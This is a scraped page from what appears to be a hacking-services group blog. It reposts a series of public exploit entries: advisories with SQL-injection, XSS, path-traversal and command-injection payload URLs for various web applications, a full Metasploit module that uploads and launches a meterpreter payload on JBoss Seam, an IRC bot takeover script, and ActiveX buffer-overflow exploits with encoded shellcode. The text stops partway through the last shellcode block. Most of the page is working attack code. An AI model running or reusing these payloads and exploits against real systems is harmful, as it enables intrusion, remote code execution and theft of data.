source: https://www.securityfocus.com/bid/51869/info
Apache HTTP Server is prone to a security-bypass vulnerability.
Successful exploits will allow attackers to bypass certain security restrictions and obtain sensitive information about running web applications.
RewriteRule ^(.*) http://www.example.com$1
ProxyPassMatch ^(.*) http://www.example.com$1
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863536769
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/51866/info
Edraw Diagram Component ActiveX control ('EDBoard.ocx') is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary code in the context of the application, usually Internet Explorer, using the ActiveX control. Failed attacks will likely cause denial-of-service conditions.
Edraw Diagram Component 5 is vulnerable; other versions may also be affected.
Author : Senator of Pirates
This exploit tested on Windows Xp SP3 EN
http://www.edrawsoft.com/download/EDBoardSetup.exe
--------------------------------------------------------------------------------------------------------
<object
classid='clsid:6116A7EC-B914-4CCE-B186-66E0EE7067CF' id='target' /> <script language='vbscript'>targetFile = "C:\Program Files\edboard\EDBoard.ocx"
prototype = "Invoke_Unknown LicenseName As String"
memberName = "LicenseName"
progid = "EDBoardLib.EDBoard"
argCount = 1
arg1=String(3092, "A")
target.LicenseName = arg1</script>
source: https://www.securityfocus.com/bid/51865/info
PHP-Fusion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/weblinks.php?weblink_id=[Sql]
source: https://www.securityfocus.com/bid/51842/info
project-open is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/register/account-closed?message=[arbitrary-JavaScript]
source: https://www.securityfocus.com/bid/51804/info
The Currency Converter component for Joomla! is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/path/modules/mod_currencyconverter/includes/convert.php?from=[XSS]
source: https://www.securityfocus.com/bid/51802/info
The 'com_bnf' component for Joomla! is prone to a remote SQL injection vulnerability.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=[SQL Injection]&direccion=&direct=0&Itemid=0&lang=es
source: https://www.securityfocus.com/bid/51799/info
GForge is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.
http://www.example.com/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.example.com/gf/user/eleo/userblog/my/admin/?action=UserblogDelete&id=2%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
source: https://www.securityfocus.com/bid/51803/info
iknSupport is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/module/kb/search_word/" onmouseover=alert(1) bad=/"/Submit/Search/task/search
source: https://www.securityfocus.com/bid/51793/info
phpLDAPadmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
phpLDAPadmin 1.2.2 is affected; other versions may also be vulnerable.
http://www.example.com/phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&query=none&format=list&showresults=na&base=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&scope=sub&
filter=objectClass%3D* display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search
#
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'JBoss Seam 2 File Upload and Execute',
'Description' => %q{
Versions of the JBoss Seam 2 framework < 2.2.1CR2 fails to properly
sanitize inputs to some JBoss Expression Language expressions. As a
result, attackers can gain remote code execution through the
application server. This module leverages RCE to upload and execute
a meterpreter payload.
Versions of the JBoss AS admin-console are known to be vulnerable to
this exploit, without requiring authentication. Tested against
JBoss AS 5 and 6, running on Linux with JDKs 6 and 7.
This module provides a more efficient method of exploitation - it
does not loop to find desired Java classes and methods.
NOTE: the check for upload success is not 100% accurate.
NOTE 2: The module uploads the meterpreter JAR and a JSP to launch
it.
},
'Author' => [ 'vulp1n3 <vulp1n3[at]gmail.com>' ],
'References' =>
[
# JBoss EAP 4.3.0 does not properly sanitize JBoss EL inputs
['CVE', '2010-1871'],
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=615956'],
['URL', 'http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html'],
['URL', 'http://archives.neohapsis.com/archives/bugtraq/2013-05/0117.html']
],
'DisclosureDate' => "Aug 05 2010",
'License' => MSF_LICENSE,
'Platform' => %w{ java },
'Targets' =>
[
[ 'Java Universal',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java'
},
]
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(8080),
OptString.new('AGENT', [ true, "User-Agent to send with requests", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"]),
OptString.new('CTYPE', [ true, "Content-Type to send with requests", "application/x-www-form-urlencoded"]),
OptString.new('TARGETURI', [ true, "URI that is built on JBoss Seam 2", "/admin-console/login.seam"]),
OptInt.new('TIMEOUT', [ true, 'Timeout for web requests', 10]),
OptString.new('FNAME', [ false, "Name of file to create - NO EXTENSION! (default: random)", nil]),
OptInt.new('CHUNKSIZE', [ false, 'Size in bytes of chunk per request', 1024]),
], self.class)
end
def check
vprint_status("#{rhost}:#{rport} Checking for vulnerable JBoss Seam 2")
uri = target_uri.path
res = send_request_cgi(
{
'uri' => normalize_uri(uri),
'method' => 'POST',
'ctype' => datastore['CTYPE'],
'agent' => datastore['AGENT'],
'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime')}"
}, timeout=datastore['TIMEOUT'])
if (res and res.code == 302 and res.headers['Location'])
vprint_debug("Server sent a 302 with location")
if (res.headers['Location'] =~ %r(public\+static\+java\.lang\.Runtime\+java.lang.Runtime.getRuntime\%28\%29))
report_vuln({
:host => rhost,
:port => rport,
:name => "#{self.name} - #{uri}",
:refs => self.references,
:info => "Module #{self.fullname} found vulnerable JBoss Seam 2 resource."
})
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
else
return Exploit::CheckCode::Unknown
end
# If we reach this point, we didn't find the service
return Exploit::CheckCode::Unknown
end
def execute_cmd(cmd)
cmd_to_run = Rex::Text.uri_encode(cmd)
vprint_status("#{rhost}:#{rport} Sending command: #{cmd_to_run}")
uri = target_uri.path
res = send_request_cgi(
{
'uri' => normalize_uri(uri),
'method' => 'POST',
'ctype' => datastore['CTYPE'],
'agent' => datastore['AGENT'],
'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(expressions.getClass().forName('java.lang.Runtime')).exec('#{cmd_to_run}')}"
}, timeout=datastore['TIMEOUT'])
if (res and res.code == 302 and res.headers['Location'])
if (res.headers['Location'] =~ %r(user=java.lang.UNIXProcess))
vprint_status("#{rhost}:#{rport} Exploit successful")
else
vprint_status("#{rhost}:#{rport} Exploit failed.")
end
else
vprint_status("#{rhost}:#{rport} Exploit failed.")
end
end
def call_jsp(jspname)
# TODO ugly way to strip off last resource on a path
uri = target_uri.path
*keep,ignore = uri.split(/\//)
keep.push(jspname)
uri = keep.join("/")
uri = "/" + uri if (uri[0] != "/")
res = send_request_cgi(
{
'uri' => normalize_uri(uri),
'method' => 'POST',
'ctype' => datastore['CTYPE'],
'agent' => datastore['AGENT'],
'data' => "sessionid=" + Rex::Text.rand_text_alpha(32)
}, timeout=datastore['TIMEOUT'])
if (res and res.code == 200)
vprint_status("Successful request to JSP")
else
vprint_error("Failed to request JSP")
end
end
def upload_jsp(filename,jarname)
jsp_text = <<EOJSP
<%@ page import="java.io.*"
%><%@ page import="java.net.*"
%><%
URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(request.getRealPath("/#{jarname}")).toURI().toURL()});
Class c = cl.loadClass("metasploit.Payload");
c.getMethod("main",Class.forName("[Ljava.lang.String;")).invoke(null,new java.lang.Object[]{new java.lang.String[0]});
%>
EOJSP
vprint_status("Uploading JSP to launch payload")
status = upload_file_chunk(filename,'false',jsp_text)
if status
vprint_status("JSP uploaded to to #{filename}")
else
vprint_error("Failed to upload file.")
end
@pl_sent = true
end
def upload_file_chunk(filename, append='false', chunk)
# create URL-safe Base64-encoded version of chunk
b64 = Rex::Text.encode_base64(chunk)
b64 = b64.gsub("+","%2b")
b64 = b64.gsub("/","%2f")
uri = target_uri.path
res = send_request_cgi(
{
'uri' => normalize_uri(uri),
'method' => 'POST',
'ctype' => datastore['CTYPE'],
'agent' => datastore['AGENT'],
'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.io.FileOutputStream').getConstructor('java.lang.String',expressions.getClass().forName('java.lang.Boolean').getField('TYPE').get(null)).newInstance(request.getRealPath('/#{filename}').replaceAll('\\\\\\\\','/'),#{append}).write(expressions.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer(request.getParameter('c'))).close()}&c=" + b64
}, timeout=datastore['TIMEOUT'])
if (res and res.code == 302 and res.headers['Location'])
# TODO Including the conversationId part in this regex might cause
# failure on other Seam applications. Needs more testing
if (res.headers['Location'] =~ %r(user=&conversationId))
#vprint_status("#{rhost}:#{rport} Exploit successful.")
return true
else
#vprint_status("#{rhost}:#{rport} Exploit failed.")
return false
end
else
#vprint_status("#{rhost}:#{rport} Exploit failed.")
return false
end
end
def get_full_path(filename)
#vprint_debug("Trying to find full path for #{filename}")
uri = target_uri.path
res = send_request_cgi(
{
'uri' => normalize_uri(uri),
'method' => 'POST',
'ctype' => datastore['CTYPE'],
'agent' => datastore['AGENT'],
'data' => "actionOutcome=/success.xhtml?user%3d%23{request.getRealPath('/#{filename}').replaceAll('\\\\\\\\','/')}"
}, timeout=datastore['TIMEOUT'])
if (res and res.code == 302 and res.headers['Location'])
# the user argument should be set to the result of our call - which
# will be the full path of our file
matches = /.*user=(.+)\&.*/.match(res.headers['Location'])
#vprint_debug("Location is " + res.headers['Location'])
if (matches and matches.captures)
return Rex::Text::uri_decode(matches.captures[0])
else
return nil
end
else
return nil
end
end
def java_stager(fname, chunk_size)
@payload_exe = fname + ".jar"
jsp_name = fname + ".jsp"
#data = payload.encoded_jar.pack
data = payload.encoded_jar.pack
append = 'false'
while (data.length > chunk_size)
status = upload_file_chunk(@payload_exe, append, data[0, chunk_size])
if status
vprint_debug("Uploaded chunk")
else
vprint_error("Failed to upload chunk")
break
end
data = data[chunk_size, data.length - chunk_size]
# first chunk is an overwrite, afterwards, we need to append
append = 'true'
end
status = upload_file_chunk(@payload_exe, 'true', data)
if status
vprint_status("Payload uploaded to " + @payload_exe)
else
vprint_error("Failed to upload file.")
end
# write a JSP that can call the payload in the jar
upload_jsp(jsp_name, @payload_exe)
pe_path = get_full_path(@payload_exe) || @payload_exe
jsp_path = get_full_path(jsp_name) || jsp_name
# try to clean up our stuff;
register_files_for_cleanup(pe_path, jsp_path)
# call the JSP to launch the payload
call_jsp(jsp_name)
end
def exploit
@pl_sent = false
if check == Exploit::CheckCode::Vulnerable
fname = datastore['FNAME'] || Rex::Text.rand_text_alpha(8+rand(8))
vprint_status("#{rhost}:#{rport} Host is vulnerable")
vprint_status("#{rhost}:#{rport} Uploading file...")
# chunking code based on struts_code_exec_exception_delegator
append = 'false'
chunk_size = datastore['CHUNKSIZE']
# sanity check
if (chunk_size <= 0)
vprint_error("Invalid chunk size #{chunk_size}")
return
end
vprint_debug("Sending in chunks of #{chunk_size}")
case target['Platform']
when 'java'
java_stager(fname, chunk_size)
else
fail_with(Failure::NoTarget, 'Unsupported target platform!')
end
handler
end
end
end
source: https://www.securityfocus.com/bid/51788/info
OpenEMR is prone to local file-include and command-injection vulnerabilities because it fails to properly sanitize user-supplied input.
A remote attacker can exploit these issues to execute arbitrary shell commands with the privileges of the user running the application, obtain potentially sensitive information, and execute arbitrary local scripts in the context of the Web server process. This could allow the attacker to compromise the application and the computer; other attacks are also possible.
OpenEMR 4.1.0 is vulnerable; other versions may also be affected.
http://www.example.com/interface/fax/fax_dispatch.php?file=1%22%20||%20ls%20%3E%20123
# thehunter.py
# Exploit Title: Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution
# Author: Jay Turla ( @shipcod3 )
# Description: pitbull-w3tw0rk_hunter is POC exploit for Pitbull or w3tw0rk IRC Bot that takes over the owner of a bot which then allows Remote Code Execution.
import socket
import sys
def usage():
print("USAGE: python thehunter.py nick \n")
def main(argv):
if len(argv) < 2:
return usage()
#irc server connection settings
botnick = sys.argv[1] #admin payload for taking over the w3wt0rk bot
server = "us.dal.net" #irc server
channel = "#buhaypirata" #channel where the bot is located
irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket
print "connecting to:"+server
irc.connect((server, 6667)) #connects to the server
irc.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :I eat w3tw0rk bots!\n") #user authentication
irc.send("NICK "+ botnick +"\n") #sets nick
irc.send("JOIN "+ channel +"\n") #join the chan
irc.send("PRIVMSG "+channel+" :!bot @system 'uname -a' \n") #send the payload to the bot
while 1: #puts it in a loop
text=irc.recv(2040) #receive the text
print text #print text to console
if text.find('PING') != -1: #check if 'PING' is found
irc.send('PONG ' + text.split() [1] + '\r\n') #returnes 'PONG' back to the server (prevents pinging out!)
if text.find('!quit') != -1: #quit the Bot
irc.send ("QUIT\r\n")
sys.exit()
if text.find('Linux') != -1:
irc.send("PRIVMSG "+channel+" :The bot answers to "+botnick+" which allows command execution \r\n")
irc.send ("QUIT\r\n")
sys.exit()
if __name__ == "__main__":
main(sys.argv)
source: https://www.securityfocus.com/bid/51794/info
phpLDAPadmin is prone to cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
phpLDAPadmin 1.2.0.5-2 is affected; other versions may also be vulnerable.
https://www.example.com/phpldapadmin/cmd.php?server_id=<script>alert('XSS')</script>
https://www.example.com/phpldapadmin/index.php?server_id=<script>alert('XSS')</script>&redirect=false
source: https://www.securityfocus.com/bid/51788/info
OpenEMR is prone to local file-include and command-injection vulnerabilities because it fails to properly sanitize user-supplied input.
A remote attacker can exploit these issues to execute arbitrary shell commands with the privileges of the user running the application, obtain potentially sensitive information, and execute arbitrary local scripts in the context of the Web server process. This could allow the attacker to compromise the application and the computer; other attacks are also possible.
OpenEMR 4.1.0 is vulnerable; other versions may also be affected.
http://www.example.com/contrib/acog/print_form.php?formname=../../../etc/passwd%00
source: https://www.securityfocus.com/bid/51788/info
OpenEMR is prone to local file-include and command-injection vulnerabilities because it fails to properly sanitize user-supplied input.
A remote attacker can exploit these issues to execute arbitrary shell commands with the privileges of the user running the application, obtain potentially sensitive information, and execute arbitrary local scripts in the context of the Web server process. This could allow the attacker to compromise the application and the computer; other attacks are also possible.
OpenEMR 4.1.0 is vulnerable; other versions may also be affected.
http://www.example.com/interface/patient_file/encounter/load_form.php?formname=../../../etc/passwd%00
<html>
<!--
# Exploit Title: WebGate WinRDS PlaySiteAllChannel Stack Buffer Overflow
# Date: 01st April, 2015
# Exploit Author: Praveen Darshanam
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
# Software Link: http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36
# Tested on: Windows XP SP3 using IE6/7/8
# CVE : 2015-2094
targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll"
prototype = "Sub PlaySiteAllChannel (
ByVal SiteSerialNumber As String
)"
progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"
Tested on IE6/7/8
Author: Praveen Darshanam
http://darshanams.blogspot.com/
http://blog.disects.com/
P.S. Do not remove back slashes in shellcode and other variables
-->
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'>
</object>
<script>
var arg1 = "";
var arg2 = 1;
var arg3 = 1;
var nops = "";
var shellcode = "";
var buff2 = "";
for (i=0; i<128; i++)
{
arg1 += "B";
}
var nseh = "\xeb\x10PD";
var seh = "\xa0\xf2\x07\x10";
for (i=0;i<80; i++)
{
nops += "\x90";
}
shellcode = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
for (i=0;i<(5000 - (arg1.length + nseh.length + seh.length + nops.length + shellcode.length)); i++)
{
buff2 += "A";
}
fbuff = arg1 + nseh + seh + nops + shellcode + buff2;
target.PlaySiteAllChannel(fbuff)
</script>
</html>
source: https://www.securityfocus.com/bid/51631/info
Raven is prone to a vulnerability that lets an attacker upload and execute arbitrary script code in the context of the affected webserver process. The issue occurs because the application fails to sufficiently sanitize user-supplied input.
Raven 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/[patch]/admin/fck2/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp&ServerPath=/forum/uploads/
http://www.example.com/forum/admin/fck2/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp&ServerPath=/forum/uploads/
##################################################################################################
#Exploit Title : Joomla Spider Random Article Component SQL Injection vulnerability
#Author : Jagriti Sahu AKA Incredible
#Vendor Link : http://demo.web-dorado.com/spider-random-article.html
#Date : 22/03/2015
#Discovered at : IndiShell Lab
#Love to : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^
##################################################################################################
////////////////////////
/// Overview:
////////////////////////
joomla component "Spider Random Article" is not filtering data in catID and Itemid parameters
and hence affected by SQL injection vulnerability
///////////////////////////////
// Vulnerability Description:
///////////////////////////////
vulnerability is due to catID and Itemid parameter
////////////////
/// POC ////
///////////////
SQL Injection in catID parameter
=================================
Use error based double query injection with catID parameter
Injected Link--->
Like error based double query injection for exploiting username --->
http://server/index.php?option=com_rand&catID=1' and(select 1 FROM(select count(*),concat((select (select concat(database(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -&limit=1&style=1&view=articles&format=raw&Itemid=13
SQL Injection in Itemid parameter
=================================
Itemid Parameter is exploitable using xpath injection
http://server/index.php?option=com_rand&catID=1&limit=1&style=1&view=articles&format=raw&Itemid=13'and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- -
###################################################################################################
--==[[Special Thanks to]]==--
# Manish Kishan Tanwar ^_^ #
##################################################################################################
#Exploit Title : Wordpress Plugin 'Business Intelligence' Remote SQL Injection vulnerability
#Author : Jagriti Sahu AKA Incredible
#Vendor Link : https://www.wpbusinessintelligence.com
#Download Link : https://downloads.wordpress.org/plugin/wp-business-intelligence-lite.1.6.1.zip
#Date : 1/04/2015
#Discovered at : IndiShell Lab
#Love to : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^
##################################################################################################
////////////////////////
/// Overview:
////////////////////////
Wordpress plugin "Business Intelligence" is not filtering data in GET parameter ' t ', which in is file 'view.php'
and passing user supplied data to SQL queries' hence SQL injection vulnerability has taken place.
///////////////////////////////
// Vulnerability Description: /
///////////////////////////////
vulnerability is due to parameter " t " in file 'view.php'.
user can inject sql query using GET parameter 't'
////////////////
/// POC ////
///////////////
POC Image URL--->
=================
http://tinypic.com/view.php?pic=r8dyl0&s=8#.VRrvcuHRvIU
SQL Injection in parameter 't' (file 'view.php'):
=================================================
Injectable Link---> http://server/wp-content/plugins/wp-business-intelligence/view.php?t=1
Union based SQL injection exist in the parameter which can be exploited as follows:
Payload used in Exploitation for Database name --->
http://server/wp-content/plugins/wp-business-intelligence/view.php
?t=1337+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+
###
EDB Note: PoC might need work depending on version of plugin.
The provided software link is for the lite version.
Tested with following PoC:
wp-content/plugins/wp-business-intelligence-lite/view.php?t=1 and 1=1
wp-content/plugins/wp-business-intelligence-lite/view.php?t=1 and 1=2
###
###################################################################################################
--==[[Special Thanks to]]==--
# Manish Kishan Tanwar ^_^ #
<html>
<!--
# Exploit Title: WESP SDK ChangePassword Stack Overflow
# Date: 01st April, 2015
# Exploit Author: Praveen Darshanam
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
# Software Link: http://www.webgateinc.com/wgi_htdocs/eng/bbs/zboard.php?id=sdk_pds_eng
# Version: WESP SDK (package version 1.2)
# Tested on: Windows XP SP3 using IE6/7/8
# CVE : 2015-2097
targetFile = "C:\Windows\System32\WESPSDK\WESPConfig.dll"
prototype = "Function ChangePassword ( ByVal oldPwd As String , ByVal newPwd As String ) As Integer"
progid = "WESPCONFIGLib.UserItem"
Tested on IE6/7/8
Author: Praveen Darshanam
http://darshanams.blogspot.com/
http://blog.disects.com/
P.S. Do not remove back slashes in shellcode and other variables
-->
<object classid='clsid:9B61891E-D876-476E-B1E8-AA662F332004' id='target'>
</object>
<script>
var arg1 = "";
var arg2 = "PraveenD";
var nops = "";
var shellcode = "";
var buff2 = "";
for (i=0; i<248; i++)
{
arg1 += "B";
}
var nseh = "\xeb\x10PD";
//WESPConfig.dll(0x10022f35 = pop pop pop ret)
var seh = "\x3d\x2f\x02\x10";
for (i=0;i<80; i++)
{
nops += "\x90";
}
shellcode = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
